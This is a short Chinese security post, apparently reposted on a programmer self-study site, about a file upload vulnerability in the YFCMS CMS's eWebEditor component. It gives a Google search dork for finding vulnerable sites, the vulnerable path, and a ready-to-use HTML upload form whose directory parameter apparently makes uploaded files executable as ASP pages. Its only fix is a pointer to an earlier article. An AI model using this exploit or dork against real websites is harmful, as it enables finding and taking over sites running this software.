FROM WWW.ST999.CN/BLOG BY 流浪的风
google关键字:intext:版权所有:yfcms
利用文件:admin\WebEditor\asp\upload.asp
利用代码:
<form action=" http://HdhCmsTest2cto测试数据 /admin/WebEditor\ asp \upload.asp?action=save&type=image&style=popup&cusdir=st999.asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form>
这里有个前提 ,要知道网站的后台目录才行。
修复:见前文
查看更多关于YFCMS之ewebeditor上传漏洞及修复 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11521